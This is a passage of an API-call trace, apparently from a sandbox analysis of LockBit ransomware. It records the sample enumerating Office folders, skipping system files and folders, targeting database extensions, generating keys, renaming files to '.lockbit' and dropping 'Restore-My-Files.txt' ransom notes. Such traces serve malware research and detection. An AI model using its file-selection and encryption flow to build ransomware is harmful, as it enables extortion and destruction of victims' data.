lpString2=".GIF") returned 1 [0205.507] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0205.507] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0205.507] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0205.507] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0205.507] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0205.507] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0205.508] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0205.508] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0205.508] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0205.508] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0205.508] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0205.508] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0205.508] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0205.508] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0115868.GIF") returned 1 [0205.508] lstrcmpiW (lpString1="ntldr", lpString2="J0115868.GIF") returned 1 [0205.508] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0115868.GIF") returned 1 [0205.508] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0115868.GIF") returned -1 [0205.508] lstrcmpiW (lpString1="autorun.inf", lpString2="J0115868.GIF") returned -1 [0205.508] lstrcmpiW (lpString1="thumbs.db", lpString2="J0115868.GIF") returned 1 [0205.508] lstrcmpiW (lpString1="iconcache.db", lpString2="J0115868.GIF") returned -1 [0205.508] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0205.508] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115868.GIF") returned=".GIF" [0205.508] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0205.508] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0205.508] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0205.508] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0205.508] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0205.508] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0205.508] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0205.508] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0205.508] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0205.508] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0205.508] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0205.508] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0205.508] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0205.508] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0205.508] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0205.508] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0205.508] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0205.508] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0205.508] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0205.508] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0205.509] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0205.509] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0205.509] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0205.509] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0205.509] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0205.509] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0205.509] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0205.509] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0205.509] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115868.GIF.lockbit") returned 78 [0205.509] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115868.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\j0115868.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0205.510] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0205.510] malloc (_Size=0x40068) returned 0x3df0008 [0205.510] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=224) returned 1 [0205.510] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0205.511] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0205.511] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0205.511] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0205.511] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0205.511] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0205.511] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0205.514] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115868.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115868.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0205.514] malloc (_Size=0xb2) returned 0x1fa2ed8 [0205.514] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0205.514] free (_Block=0x1fa2ed8) [0205.514] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115868.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0205.514] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0205.514] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0205.514] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb5774520, ftCreationTime.dwHighDateTime=0x1d6047d, ftLastAccessTime.dwLowDateTime=0xb5774520, ftLastAccessTime.dwHighDateTime=0x1d6047d, ftLastWriteTime.dwLowDateTime=0xb5774520, ftLastWriteTime.dwHighDateTime=0x1d6047d, nFileSizeHigh=0x0, nFileSizeLow=0x472, dwReserved0=0x0, dwReserved1=0x0, cFileName="Restore-My-Files.txt", cAlternateFileName="RESTOR~1.TXT")) returned 1 [0205.514] lstrcmpiW (lpString1=".", lpString2="Restore-My-Files.txt") returned -1 [0205.514] lstrcmpiW (lpString1="..", lpString2="Restore-My-Files.txt") returned -1 [0205.514] PathFindExtensionW (pszPath="Restore-My-Files.txt") returned=".txt" [0205.514] lstrcmpiW (lpString1=".386", lpString2=".txt") returned -1 [0205.514] lstrcmpiW (lpString1=".cmd", lpString2=".txt") returned -1 [0205.515] lstrcmpiW (lpString1=".exe", lpString2=".txt") returned -1 [0205.515] lstrcmpiW (lpString1=".ani", lpString2=".txt") returned -1 [0205.515] lstrcmpiW (lpString1=".adv", lpString2=".txt") returned -1 [0205.515] lstrcmpiW (lpString1=".theme", lpString2=".txt") returned -1 [0205.515] lstrcmpiW (lpString1=".msi", lpString2=".txt") returned -1 [0205.515] lstrcmpiW (lpString1=".msp", lpString2=".txt") returned -1 [0205.515] lstrcmpiW (lpString1=".com", lpString2=".txt") returned -1 [0205.515] lstrcmpiW (lpString1=".diagpkg", lpString2=".txt") returned -1 [0205.515] lstrcmpiW (lpString1=".nls", lpString2=".txt") returned -1 [0205.515] lstrcmpiW (lpString1=".diagcab", lpString2=".txt") returned -1 [0205.515] lstrcmpiW (lpString1=".lock", lpString2=".txt") returned -1 [0205.515] lstrcmpiW (lpString1=".ocx", lpString2=".txt") returned -1 [0205.515] lstrcmpiW (lpString1=".mpa", lpString2=".txt") returned -1 [0205.515] lstrcmpiW (lpString1=".cpl", lpString2=".txt") returned -1 [0205.515] lstrcmpiW (lpString1=".mod", lpString2=".txt") returned -1 [0205.515] lstrcmpiW (lpString1=".hta", lpString2=".txt") returned -1 [0205.515] lstrcmpiW (lpString1=".icns", lpString2=".txt") returned -1 [0205.515] lstrcmpiW (lpString1=".prf", lpString2=".txt") returned -1 [0205.515] lstrcmpiW (lpString1=".rtp", lpString2=".txt") returned -1 [0205.515] lstrcmpiW (lpString1=".diagcfg", lpString2=".txt") returned -1 [0205.515] lstrcmpiW (lpString1=".msstyles", lpString2=".txt") returned -1 [0205.515] lstrcmpiW (lpString1=".bin", lpString2=".txt") returned -1 [0205.515] lstrcmpiW (lpString1=".hlp", lpString2=".txt") returned -1 [0205.515] lstrcmpiW (lpString1=".shs", lpString2=".txt") returned -1 [0205.515] lstrcmpiW (lpString1=".drv", lpString2=".txt") returned -1 [0205.515] lstrcmpiW (lpString1=".wpx", lpString2=".txt") returned 1 [0205.515] lstrcmpiW (lpString1=".bat", lpString2=".txt") returned -1 [0205.515] lstrcmpiW (lpString1=".rom", lpString2=".txt") returned -1 [0205.515] lstrcmpiW (lpString1=".msc", lpString2=".txt") returned -1 [0205.515] lstrcmpiW (lpString1=".spl", lpString2=".txt") returned -1 [0205.515] lstrcmpiW (lpString1=".ps1", lpString2=".txt") returned -1 [0205.515] lstrcmpiW (lpString1=".msu", lpString2=".txt") returned -1 [0205.515] lstrcmpiW (lpString1=".ics", lpString2=".txt") returned -1 [0205.515] lstrcmpiW (lpString1=".key", lpString2=".txt") returned -1 [0205.515] lstrcmpiW (lpString1=".mp3", lpString2=".txt") returned -1 [0205.516] lstrcmpiW (lpString1=".reg", lpString2=".txt") returned -1 [0205.516] lstrcmpiW (lpString1=".dll", lpString2=".txt") returned -1 [0205.516] lstrcmpiW (lpString1=".ini", lpString2=".txt") returned -1 [0205.516] lstrcmpiW (lpString1=".idx", lpString2=".txt") returned -1 [0205.516] lstrcmpiW (lpString1=".sys", lpString2=".txt") returned -1 [0205.516] lstrcmpiW (lpString1=".hlp", lpString2=".txt") returned -1 [0205.516] lstrcmpiW (lpString1=".ico", lpString2=".txt") returned -1 [0205.516] lstrcmpiW (lpString1=".lnk", lpString2=".txt") returned -1 [0205.516] lstrcmpiW (lpString1=".rdp", lpString2=".txt") returned -1 [0205.516] lstrcmpiW (lpString1=".lockbit", lpString2=".txt") returned -1 [0205.516] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Restore-My-Files.txt") returned 0 [0205.516] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb5774520, ftCreationTime.dwHighDateTime=0x1d6047d, ftLastAccessTime.dwLowDateTime=0xb5774520, ftLastAccessTime.dwHighDateTime=0x1d6047d, ftLastWriteTime.dwLowDateTime=0xb5774520, ftLastWriteTime.dwHighDateTime=0x1d6047d, nFileSizeHigh=0x0, nFileSizeLow=0x472, dwReserved0=0x0, dwReserved1=0x0, cFileName="Restore-My-Files.txt", cAlternateFileName="RESTOR~1.TXT")) returned 0 [0205.516] FindClose (in: hFindFile=0x55fe78 | out: hFindFile=0x55fe78) returned 1 [0205.516] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5178e0b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xbd4548c0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xbd4548c0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="LINES", cAlternateFileName="")) returned 1 [0205.516] lstrcmpiW (lpString1=".", lpString2="LINES") returned -1 [0205.516] lstrcmpiW (lpString1="..", lpString2="LINES") returned -1 [0205.516] lstrcmpiW (lpString1="LINES", lpString2="$windows.~bt") returned 1 [0205.516] lstrcmpiW (lpString1="LINES", lpString2="intel") returned 1 [0205.516] lstrcmpiW (lpString1="LINES", lpString2="msocache") returned -1 [0205.516] lstrcmpiW (lpString1="LINES", lpString2="$recycle.bin") returned 1 [0205.516] lstrcmpiW (lpString1="LINES", lpString2="$windows.~ws") returned 1 [0205.516] lstrcmpiW (lpString1="LINES", lpString2="tor browser") returned -1 [0205.516] lstrcmpiW (lpString1="LINES", lpString2="boot") returned 1 [0205.516] lstrcmpiW (lpString1="LINES", lpString2="system volume information") returned -1 [0205.516] lstrcmpiW (lpString1="LINES", lpString2="perflogs") returned -1 [0205.516] lstrcmpiW (lpString1="LINES", lpString2="google") returned 1 [0205.516] lstrcmpiW (lpString1="LINES", lpString2="application data") returned 1 [0205.516] lstrcmpiW (lpString1="LINES", lpString2="windows") returned -1 [0205.516] lstrcmpiW (lpString1="LINES", lpString2="windows.old") returned -1 [0205.516] lstrcmpiW (lpString1="LINES", lpString2="appdata") returned 1 [0205.517] lstrcmpiW (lpString1="LINES", lpString2="Windows nt") returned -1 [0205.517] lstrcmpiW (lpString1="LINES", lpString2="Msbuild") returned -1 [0205.517] lstrcmpiW (lpString1="LINES", lpString2="Microsoft") returned -1 [0205.517] lstrcmpiW (lpString1="LINES", lpString2="All users") returned 1 [0205.517] lstrcmpiW (lpString1="LINES", lpString2="mozilla") returned -1 [0205.517] lstrcmpiW (lpString1="LINES", lpString2="Microsoft.NET") returned -1 [0205.517] lstrcmpiW (lpString1="LINES", lpString2="microsoft shared") returned -1 [0205.517] lstrcmpiW (lpString1="LINES", lpString2="Internet Explorer") returned 1 [0205.517] lstrcmpiW (lpString1="LINES", lpString2="common files") returned 1 [0205.517] lstrcmpiW (lpString1="LINES", lpString2="opera") returned -1 [0205.517] lstrcmpiW (lpString1="LINES", lpString2="Windows Journal") returned -1 [0205.517] wsprintfW (in: param_1=0x3d6b928, param_2="%s\\%s" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES") returned 55 [0205.517] wsprintfW (in: param_1=0x3d6ad00, param_2="%s\\*" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\*") returned 57 [0205.517] FindFirstFileExW (in: lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\*", fInfoLevelId=0x0, lpFindFileData=0x3d6b120, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x3d6b120) returned 0x55fe78 [0205.591] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0205.592] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5178e0b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xbd4548c0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xbd4548c0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0205.642] lstrcmpiW (lpString1=".", lpString2="..") returned -1 [0205.642] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0205.642] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b0e4a00, ftCreationTime.dwHighDateTime=0x1bd5ead, ftLastAccessTime.dwLowDateTime=0xbc847960, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x9b0e4a00, ftLastWriteTime.dwHighDateTime=0x1bd5ead, nFileSizeHigh=0x0, nFileSizeLow=0x3d2, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD10219_.GIF", cAlternateFileName="")) returned 1 [0205.642] lstrcmpiW (lpString1=".", lpString2="BD10219_.GIF") returned -1 [0205.642] lstrcmpiW (lpString1="..", lpString2="BD10219_.GIF") returned -1 [0205.642] PathFindExtensionW (pszPath="BD10219_.GIF") returned=".GIF" [0205.642] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0205.642] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0205.642] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0205.642] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0205.642] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0205.642] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0205.642] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0205.642] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0205.642] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0205.642] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0205.642] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0205.642] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0205.642] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0205.642] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0205.642] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0205.642] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0205.642] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0205.642] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0205.642] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0205.642] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0205.642] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0205.642] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0205.642] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0205.642] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0205.642] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0205.643] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0205.643] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0205.643] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0205.643] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0205.643] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0205.643] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0205.643] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0205.643] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0205.643] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0205.643] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0205.643] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0205.643] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0205.643] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0205.643] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0205.643] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0205.643] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0205.643] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0205.643] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0205.643] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0205.643] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0205.643] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0205.643] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0205.643] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD10219_.GIF") returned 1 [0205.643] lstrcmpiW (lpString1="ntldr", lpString2="BD10219_.GIF") returned 1 [0205.643] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD10219_.GIF") returned 1 [0205.643] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD10219_.GIF") returned 1 [0205.643] lstrcmpiW (lpString1="autorun.inf", lpString2="BD10219_.GIF") returned -1 [0205.643] lstrcmpiW (lpString1="thumbs.db", lpString2="BD10219_.GIF") returned 1 [0205.643] lstrcmpiW (lpString1="iconcache.db", lpString2="BD10219_.GIF") returned 1 [0205.643] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\") returned="" [0205.643] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD10219_.GIF") returned=".GIF" [0205.644] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0205.644] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0205.644] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0205.644] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0205.644] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0205.644] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0205.644] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0205.644] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0205.644] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0205.644] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0205.644] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0205.644] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0205.644] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0205.644] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0205.644] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0205.644] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0205.644] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0205.644] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0205.644] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0205.644] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0205.644] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0205.644] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0205.644] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0205.644] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0205.644] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0205.644] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0205.644] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0205.644] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0205.645] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD10219_.GIF.lockbit") returned 76 [0205.645] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD10219_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd10219_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0205.658] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0205.658] malloc (_Size=0x40068) returned 0x3df0008 [0205.658] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=978) returned 1 [0205.659] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0205.659] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0205.659] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0205.659] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0205.659] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0205.659] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0205.659] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0205.666] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD10219_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD10219_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0205.666] malloc (_Size=0xae) returned 0x1fa2ed8 [0205.666] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xae, FileInformationClass=0xa) returned 0xc0000008 [0205.666] free (_Block=0x1fa2ed8) [0205.666] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD10219_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES") returned 1 [0205.666] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt") returned 76 [0205.666] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0205.668] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0205.668] malloc (_Size=0x40068) returned 0x3df0008 [0205.668] WriteFile (in: hFile=0x3cc, lpBuffer=0x1fa30f8, nNumberOfBytesToWrite=0x472, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x1fa30f8, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0205.669] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8d9c300, 